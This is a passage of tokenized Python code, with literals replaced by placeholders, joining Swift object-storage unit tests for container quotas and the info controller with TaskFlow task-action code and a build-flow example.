req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_counts_quota_copy_cross_account_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> a_c_cache = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } , <EOL> '<STR_LIT:status>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> a2_c_cache = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } , <EOL> '<STR_LIT:status>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : a_c_cache , <EOL> '<STR_LIT>' : a2_c_cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_counts_quota_copy_cross_account_PUT_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> a_c_cache = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } , <EOL> '<STR_LIT:status>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> a2_c_cache = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } , <EOL> '<STR_LIT:status>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : a_c_cache , <EOL> '<STR_LIT>' : a2_c_cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:a>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_not_exceed_counts_quota ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_not_exceed_counts_quota_copy_from ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_not_exceed_counts_quota_copy_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_invalid_quotas ( self ) : <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : '<STR_LIT:abc>' } ) <EOL> res = req . get_response ( <EOL> container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : '<STR_LIT:abc>' } ) <EOL> res = req . get_response ( <EOL> container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> def test_valid_quotas ( self ) : <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( <EOL> container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( <EOL> container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_delete_quotas ( self ) : <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : None } ) <EOL> res = req . get_response ( <EOL> container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_missing_container ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeMissingApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> def test_auth_fail ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } , <EOL> '<STR_LIT>' : None } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : lambda * args : HTTPUnauthorized ( ) } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import json <EOL> import unittest <EOL> import time <EOL> from mock import Mock <EOL> from swift . proxy . controllers import InfoController <EOL> from swift . proxy . server import Application as ProxyApp <EOL> from swift . common import utils <EOL> from swift . common . swob import Request , HTTPException <EOL> class TestInfoController ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> utils . _swift_info = { } <EOL> utils . _swift_admin_info = { } <EOL> def get_controller ( self , expose_info = None , disallowed_sections = None , <EOL> admin_key = None ) : <EOL> disallowed_sections = disallowed_sections or [ ] <EOL> app = Mock ( spec = ProxyApp ) <EOL> return InfoController ( app , None , expose_info , <EOL> disallowed_sections , admin_key ) <EOL> def start_response ( self , status , headers ) : <EOL> self . got_statuses . append ( status ) <EOL> for h in headers : <EOL> self . got_headers . append ( { h [ <NUM_LIT:0> ] : h [ <NUM_LIT:1> ] } ) <EOL> def test_disabled_info ( self ) : <EOL> controller = self . get_controller ( expose_info = False ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> info = json . loads ( resp . body ) <EOL> self . assertTrue ( '<STR_LIT>' not in info ) <EOL> self . assertTrue ( '<STR_LIT:foo>' in info ) <EOL> self . assertTrue ( '<STR_LIT:bar>' in info [ '<STR_LIT:foo>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT:foo>' ] [ '<STR_LIT:bar>' ] , '<STR_LIT>' ) <EOL> def test_options_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . OPTIONS ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> self . assertTrue ( '<STR_LIT>' in resp . headers ) <EOL> def test_get_info_cors ( self ) : <EOL> controller = self . get_controller ( expose_info = True ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> info = json . loads ( resp . body ) <EOL> self . assertTrue ( '<STR_LIT>' not in info ) <EOL> self . assertTrue ( '<STR_LIT:foo>' in info ) <EOL> self . assertTrue ( '<STR_LIT:bar>' in info [ '<STR_LIT:foo>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT:foo>' ] [ '<STR_LIT:bar>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( '<STR_LIT>' in resp . headers ) <EOL> self . assertTrue ( '<STR_LIT>' in resp . headers ) <EOL> def test_head_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> resp = controller . HEAD ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_disallow_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> disallowed_sections = [ '<STR_LIT>' ] ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> info = json . loads ( resp . body ) <EOL> self . assertTrue ( '<STR_LIT:foo>' in info ) <EOL> self . assertTrue ( '<STR_LIT:bar>' in info [ '<STR_LIT:foo>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT:foo>' ] [ '<STR_LIT:bar>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( '<STR_LIT>' not in info ) <EOL> def test_disabled_admin_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True , admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_admin_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> info = json . loads ( resp . body ) <EOL> self . assertTrue ( '<STR_LIT>' in info ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_head_admin_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_admin_info_invalid_method ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_admin_info_invalid_expires ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = <NUM_LIT:1> <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> expires = '<STR_LIT:abc>' <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_admin_info_invalid_path ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_admin_info_invalid_key ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_admin_disallow_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> disallowed_sections = [ '<STR_LIT>' ] , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> info = json . loads ( resp . body ) <EOL> self . assertTrue ( '<STR_LIT>' not in info ) <EOL> self . assertTrue ( '<STR_LIT>' in info ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import functools <EOL> from taskflow . engines . action_engine . actions import base <EOL> from taskflow import logging <EOL> from taskflow import states <EOL> from taskflow import task as task_atom <EOL> from taskflow . types import failure <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class TaskAction ( base . Action ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , storage , notifier , task_executor ) : <EOL> super ( TaskAction , self ) . __init__ ( storage , notifier ) <EOL> self . _task_executor = task_executor <EOL> def _is_identity_transition ( self , old_state , state , task , progress = None ) : <EOL> if state in self . SAVE_RESULT_STATES : <EOL> return False <EOL> if state != old_state : <EOL> return False <EOL> if progress is None : <EOL> return False <EOL> old_progress = self . _storage . get_task_progress ( task . name ) <EOL> if old_progress != progress : <EOL> return False <EOL> return True <EOL> def change_state ( self , task , state , <EOL> progress = None , result = base . Action . NO_RESULT ) : <EOL> old_state = self . _storage . get_atom_state ( task . name ) <EOL> if self . _is_identity_transition ( old_state , state , task , <EOL> progress = progress ) : <EOL> return <EOL> if state in self . SAVE_RESULT_STATES : <EOL> save_result = None <EOL> if result is not self . NO_RESULT : <EOL> save_result = result <EOL> self . _storage . save ( task . name , save_result , state ) <EOL> else : <EOL> self . _storage . set_atom_state ( task . name , state ) <EOL> if progress is not None : <EOL> self . _storage . set_task_progress ( task . name , progress ) <EOL> task_uuid = self . _storage . get_atom_uuid ( task . name ) <EOL> details = { <EOL> '<STR_LIT>' : task . name , <EOL> '<STR_LIT>' : task_uuid , <EOL> '<STR_LIT>' : old_state , <EOL> } <EOL> if result is not self . NO_RESULT : <EOL> details [ '<STR_LIT:result>' ] = result <EOL> self . _notifier . notify ( state , details ) <EOL> if progress is not None : <EOL> task . update_progress ( progress ) <EOL> def _on_update_progress ( self , task , event_type , details ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> progress = details . pop ( '<STR_LIT>' ) <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> try : <EOL> self . _storage . set_task_progress ( task . name , progress , <EOL> details = details ) <EOL> except Exception : <EOL> LOG . exception ( "<STR_LIT>" , <EOL> task , progress ) <EOL> def schedule_execution ( self , task ) : <EOL> self . change_state ( task , states . RUNNING , progress = <NUM_LIT:0.0> ) <EOL> arguments = self . _storage . fetch_mapped_args ( <EOL> task . rebind , <EOL> atom_name = task . name , <EOL> optional_args = task . optional <EOL> ) <EOL> if task . notifier . can_be_registered ( task_atom . EVENT_UPDATE_PROGRESS ) : <EOL> progress_callback = functools . partial ( self . _on_update_progress , <EOL> task ) <EOL> else : <EOL> progress_callback = None <EOL> task_uuid = self . _storage . get_atom_uuid ( task . name ) <EOL> return self . _task_executor . execute_task ( <EOL> task , task_uuid , arguments , <EOL> progress_callback = progress_callback ) <EOL> def complete_execution ( self , task , result ) : <EOL> if isinstance ( result , failure . Failure ) : <EOL> self . change_state ( task , states . FAILURE , result = result ) <EOL> else : <EOL> self . change_state ( task , states . SUCCESS , <EOL> result = result , progress = <NUM_LIT:1.0> ) <EOL> def schedule_reversion ( self , task ) : <EOL> self . change_state ( task , states . REVERTING , progress = <NUM_LIT:0.0> ) <EOL> arguments = self . _storage . fetch_mapped_args ( <EOL> task . revert_rebind , <EOL> atom_name = task . name , <EOL> optional_args = task . revert_optional <EOL> ) <EOL> task_uuid = self . _storage . get_atom_uuid ( task . name ) <EOL> task_result = self . _storage . get ( task . name ) <EOL> failures = self . _storage . get_failures ( ) <EOL> if task . notifier . can_be_registered ( task_atom . EVENT_UPDATE_PROGRESS ) : <EOL> progress_callback = functools . partial ( self . _on_update_progress , <EOL> task ) <EOL> else : <EOL> progress_callback = None <EOL> return self . _task_executor . revert_task ( <EOL> task , task_uuid , arguments , task_result , failures , <EOL> progress_callback = progress_callback ) <EOL> def complete_reversion ( self , task , result ) : <EOL> if isinstance ( result , failure . Failure ) : <EOL> self . change_state ( task , states . REVERT_FAILURE , result = result ) <EOL> else : <EOL> self . change_state ( task , states . REVERTED , progress = <NUM_LIT:1.0> , <EOL> result = result ) </s>
<s> import logging <EOL> import os <EOL> import sys <EOL> logging . basicConfig ( level = logging . ERROR ) <EOL> top_dir = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> os . pardir , <EOL> os . pardir ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , top_dir ) <EOL> import taskflow . engines <EOL> from taskflow . patterns import graph_flow as gf <EOL> from taskflow import task <EOL> import example_utils as eu <EOL> class CompileTask ( task . Task ) : <EOL> """<STR_LIT>""" <EOL> default_provides = '<STR_LIT>' <EOL> def execute ( self , source_filename ) : <EOL> object_filename = '<STR_LIT>' % os . path . splitext ( source_filename ) [ <NUM_LIT:0> ] <EOL> print ( '<STR_LIT>' <EOL> % ( source_filename , object_filename ) ) <EOL> return object_filename <EOL> class LinkTask ( task . Task ) : <EOL> """<STR_LIT>""" <EOL> default_provides = '<STR_LIT>' <EOL> def __init__ ( self , executable_path , * args , ** kwargs ) : <EOL> super ( LinkTask , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _executable_path = executable_path <EOL> def execute ( self , ** kwargs ) : <EOL> object_filenames = list ( kwargs . values ( ) ) <EOL> print ( '<STR_LIT>' <EOL> % ( self . _executable_path , <EOL> '<STR_LIT:U+002CU+0020>' . join ( object_filenames ) ) ) <EOL> return self . _executable_path <EOL> class BuildDocsTask ( task . Task ) : <EOL> """<STR_LIT>""" <EOL> default_provides = '<STR_LIT>' <EOL> def execute ( self , ** kwargs ) : <EOL> for source_filename in kwargs . values ( ) : <EOL> print ( "<STR_LIT>" % source_filename ) <EOL> return '<STR_LIT>' <EOL> def make_flow_and_store ( source_files , executable_only = False ) : <EOL> flow = gf . TargetedFlow ( '<STR_LIT>' ) <EOL> object_targets = [ ] <EOL> store = { } <EOL> for source in source_files : <EOL> source_stored = '<STR_LIT>' % source <EOL> object_stored = '<STR_LIT>' % source <EOL> store [ source_stored ] = source <EOL> object_targets . append ( object_stored ) <EOL> flow . add ( CompileTask ( name = '<STR_LIT>' % source , <EOL> rebind = { '<STR_LIT>' : source_stored } , <EOL> provides = object_stored ) ) <EOL> flow . add ( BuildDocsTask ( requires = list ( store . keys ( ) ) ) ) <EOL> object_targets . append ( '<STR_LIT>' ) <EOL> link_task = LinkTask ( '<STR_LIT>' , requires = object_targets ) <EOL> flow . add ( link_task ) <EOL> if executable_only : <EOL> flow . set_target ( link_task ) <EOL> return flow , store <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> SOURCE_FILES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> eu . print_wrapped ( '<STR_LIT>' ) <EOL> flow , store = make_flow_and_store ( SOURCE_FILES ) <EOL> taskflow . engines . run ( flow , store = store ) <EOL> eu . print_wrapped ( '<STR_LIT>' ) <EOL> flow , store = make_flow_and_store ( SOURCE_FILES , executable_only = True ) <EOL> taskflow . engines . run ( flow , store = store ) </s>
